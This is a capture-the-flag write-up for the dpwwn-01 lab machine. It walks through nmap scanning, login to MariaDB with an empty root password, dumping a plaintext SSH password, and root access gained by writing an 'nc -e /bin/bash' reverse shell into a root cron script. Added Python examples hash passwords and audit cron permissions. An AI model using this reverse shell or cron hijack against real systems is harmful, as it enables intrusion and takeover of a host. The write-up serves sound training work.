dpwwn-01
Host discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.92.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:39 EST
Nmap scan report for 192.168.92.1
Host is up (0.00015s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:E9:BE:0B (VMware)
Nmap scan report for 192.168.92.146
Host is up (0.00030s latency).
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00036s latency).
MAC Address: 00:50:56:E0:A6:00 (VMware)
Nmap scan report for 192.168.92.130
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 17.08 seconds
Port scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:41 EST
Nmap scan report for 192.168.92.146
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
TCP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c1:d3:be:39:42:9d:5c:b4:95:2c:5b:2e:20:59:0e:3a (RSA)
| 256 43:4a:c6:10:e7:17:7d:a0:c0:c3:76:88:1d:43:a1:8c (ECDSA)
|_ 256 0e:cc:e3:e1:f7:87:73:a1:03:47:b9:e2:cf:1c:93:15 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
3306/tcp open mysql MySQL 5.5.60-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 5
| Capabilities flags: 63487
| Some Capabilities: FoundRows, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, ODBCClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongPassword, Support41Auth, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: (SL`"$.YV$L7j3\W"?Un
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
UDP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.00094s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.39 seconds
Script scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:43 EST
Nmap scan report for 192.168.92.146
Host is up (0.0011s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.25 seconds
Port 3306
Tried it casually and found the password is empty.
MySQL empty password
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> ls
->
->
->
->
-> Ctrl-C -- exit!
Aborted
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.012 sec)
MariaDB [(none)]> use ssh
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ssh]> show tables
-> ;
+---------------+
| Tables_in_ssh |
+---------------+
| users |
+---------------+
1 row in set (0.002 sec)
Plaintext storage
MariaDB [ssh]> use users;
ERROR 1049 (42000): Unknown database 'users'
MariaDB [ssh]> select * form users;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'form users' at line 1
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.008 sec)
MariaDB [ssh]> exit
Bye
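The `ssh.users` table above keeps the SSH password in the clear, so anyone who can read the table (here: anyone on the network, since root has no password) gets a working login. The following is an added example, not code from the box or from the author, showing how such a table should store credentials instead: a per-user random salt plus a memory-hard scrypt hash, verified in constant time. The sample row is a constructed copy of the one in the output; the `scrypt$salt$hash` storage format is an assumption of this example.

```python
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

# Constructed sample rows shaped like the `ssh.users` table found on the box:
# (id, username, password), with the password stored in the clear.
PLAINTEXT_ROWS: List[Tuple[int, str, str]] = [
    (1, "mistic", "testP@$$swordmistic"),
]

# scrypt parameters (assumed for this example): 2**14 work factor, r=8, p=1
# (about 16 MiB of memory per hash), 16-byte salt, 32-byte derived key.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
SALT_LEN, KEY_LEN = 16, 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing string "scrypt$<salt-hex>$<hash-hex>".

    The salt is random per user, so two users with the same password get
    different stored values, and the row never contains the password itself."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN)
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        scheme, salt_hex, _digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False  # malformed stored value: never a match
    if scheme != "scrypt":
        return False
    candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


def migrate_rows(rows: List[Tuple[int, str, str]]) -> List[Tuple[int, str, str]]:
    """Replace the plaintext column with a salted hash; returns new rows.

    This is the one-off step a migration would run over the existing table."""
    return [(row_id, user, hash_password(pw)) for row_id, user, pw in rows]


if __name__ == "__main__":
    for row_id, user, stored in migrate_rows(PLAINTEXT_ROWS):
        print(row_id, user, stored)
```

After migration the table holds only salt and hash, so a reader of the table gets no credential that works against SSH; the login path calls `verify_password` against the stored value instead of comparing strings.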
SSH connection
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo ssh mistic@192.168.92.146
The authenticity of host '192.168.92.146 (192.168.92.146)' can't be established.
ED25519 key fingerprint is SHA256:gk40nSGfkMrCYAeMyL2l9aCwV/VL5i5mWKrFfowOfH0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.146' (ED25519) to the list of known hosts.
mistic@192.168.92.146's password:
Last login: Thu Aug 1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$
[mistic@dpwwn-01 ~]$ whoami
mistic
[mistic@dpwwn-01 ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33
valid_lft 1470sec preferred_lft 1470sec
inet6 fe80::20c:29ff:fe8f:3c9f/64 scope link
valid_lft forever preferred_lft forever
[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux
[mistic@dpwwn-01 ~]$ ls
logrot.sh
[mistic@dpwwn-01 ~]$ ls -laih
总用量 16K
2536099 drwx------. 2 mistic mistic 100 8月 1 2019 .
79 drwxr-xr-x. 3 root root 20 8月 1 2019 ..
2536125 -rw-------. 1 mistic mistic 0 8月 1 2019 .bash_history
2536100 -rw-r--r--. 1 mistic mistic 18 10月 30 2018 .bash_logout
2536101 -rw-r--r--. 1 mistic mistic 193 10月 30 2018 .bash_profile
2536102 -rw-r--r--. 1 mistic mistic 231 10月 30 2018 .bashrc
2536126 -rwx------. 1 mistic mistic 186 8月 1 2019 logrot.sh
[mistic@dpwwn-01 ~]$ cat .bash_history
[mistic@dpwwn-01 ~]$ cat logrot.sh
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"
while : ; do
read line
while [[ -f $SEMAPHORE ]]; do
sleep 1s
done
printf "%s\n" "$line" >> $LOGFILE
done
Crontab privilege escalation
[[crontab file permission privilege escalation]]
[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /home/mistic/logrot.sh
[mistic@dpwwn-01 ~]$ vi logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh
nc -e /bin/bash 192.168.92.130 1234
#!/bin/bash
[mistic@dpwwn-01 ~]$
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...
connect to [192.168.92.130] from (UNKNOWN) [192.168.92.146] 49408
ls
anaconda-ks.cfg
dpwwn-01-FLAG.txt
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33
valid_lft 1119sec preferred_lft 1119sec
inet6 fe80::20c:29ff:fe8f:3c9f/64 scope link
valid_lft forever preferred_lft forever
cat dpwwn-01-FLAG.txt
Congratulation! I knew you can pwn it as this very easy challenge.
Thank you.
64445777
6e643634
37303737
37373665
36347077
776e6450
4077246e
33373336
36359090
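The root cause above is a root-owned cron entry (`*/3 * * * * root /home/mistic/logrot.sh`) whose script, and the directory containing it, belong to an unprivileged user. The audit below is an added example, not part of the original write-up: it parses `/etc/crontab`-style entries, and for every job that runs as root checks whether the program or its parent directory is owned by someone other than root or is group/world-writable. The crontab text and the fake filesystem are constructed to mirror the box; run against a real host, `audit_root_jobs(open("/etc/crontab").read())` uses `os.stat`.

```python
import os
import stat

# Constructed copy of the relevant /etc/crontab lines from the box, plus one
# well-behaved root job for contrast.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# * * * * * user-name command to be executed
*/3 * * * * root /home/mistic/logrot.sh
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""


def parse_system_crontab(text):
    """Parse /etc/crontab-style entries into {schedule, user, command} dicts.

    Handles the five-field form and @reboot/@daily shortcuts; skips comments,
    blank lines and VAR=value assignments."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:
            continue  # environment assignment such as SHELL=/bin/bash
        if first.startswith("@"):
            parts, n_sched = line.split(None, 2), 1
        else:
            parts, n_sched = line.split(None, 6), 5
        if len(parts) < n_sched + 2:
            continue  # malformed entry: no user or no command
        jobs.append({"schedule": " ".join(parts[:n_sched]),
                     "user": parts[n_sched],
                     "command": parts[n_sched + 1]})
    return jobs


def file_risks(st, what):
    """Reasons a file/directory used by a root job can be altered by a non-root user."""
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"{what} owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"{what} group-writable")
    # A sticky, world-writable directory (like /tmp) stops others replacing
    # root-owned entries, so only flag world-write without the sticky bit.
    if st.st_mode & stat.S_IWOTH and not (
            stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX):
        reasons.append(f"{what} world-writable")
    return reasons


def audit_root_jobs(text, stat_fn=os.stat):
    """Return [(job, reasons)] for root jobs whose program or its parent
    directory can be modified or replaced by a non-root user."""
    findings = []
    for job in parse_system_crontab(text):
        if job["user"] != "root":
            continue
        prog = job["command"].split()[0]
        if not prog.startswith("/"):
            continue  # resolved through PATH; a separate PATH audit covers it
        reasons = []
        try:
            reasons += file_risks(stat_fn(prog), "script")
        except FileNotFoundError:
            reasons.append("script missing (dangling root cron entry)")
        try:
            reasons += file_risks(stat_fn(os.path.dirname(prog)), "parent directory")
        except FileNotFoundError:
            reasons.append("parent directory missing")
        if reasons:
            findings.append((job, reasons))
    return findings


def fake_stat(mode, uid):
    """Build an os.stat_result from a 10-tuple (mode, ino, dev, nlink, uid, gid,
    size, atime, mtime, ctime); used for the constructed filesystem below."""
    return os.stat_result((mode, 0, 0, 1, uid, uid, 0, 0, 0, 0))


# Constructed ownership/mode data matching the `ls -laih` output on the box
# (mistic's uid of 1000 is an assumption; only "not root" matters here).
SAMPLE_FS = {
    "/home/mistic/logrot.sh": fake_stat(stat.S_IFREG | 0o700, 1000),
    "/home/mistic": fake_stat(stat.S_IFDIR | 0o700, 1000),
    "/usr/sbin/logrotate": fake_stat(stat.S_IFREG | 0o755, 0),
    "/usr/sbin": fake_stat(stat.S_IFDIR | 0o755, 0),
}


def sample_stat(path):
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path]


if __name__ == "__main__":
    for job, reasons in audit_root_jobs(SAMPLE_CRONTAB, sample_stat):
        print(job["schedule"], job["command"], "->", "; ".join(reasons))
```

The fix the audit points at is the usual one: a root job's script lives under a root-owned, non-writable path (for example `/usr/local/sbin`, mode 0755), or the job runs as the user who owns the script.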
Done, wrapping up.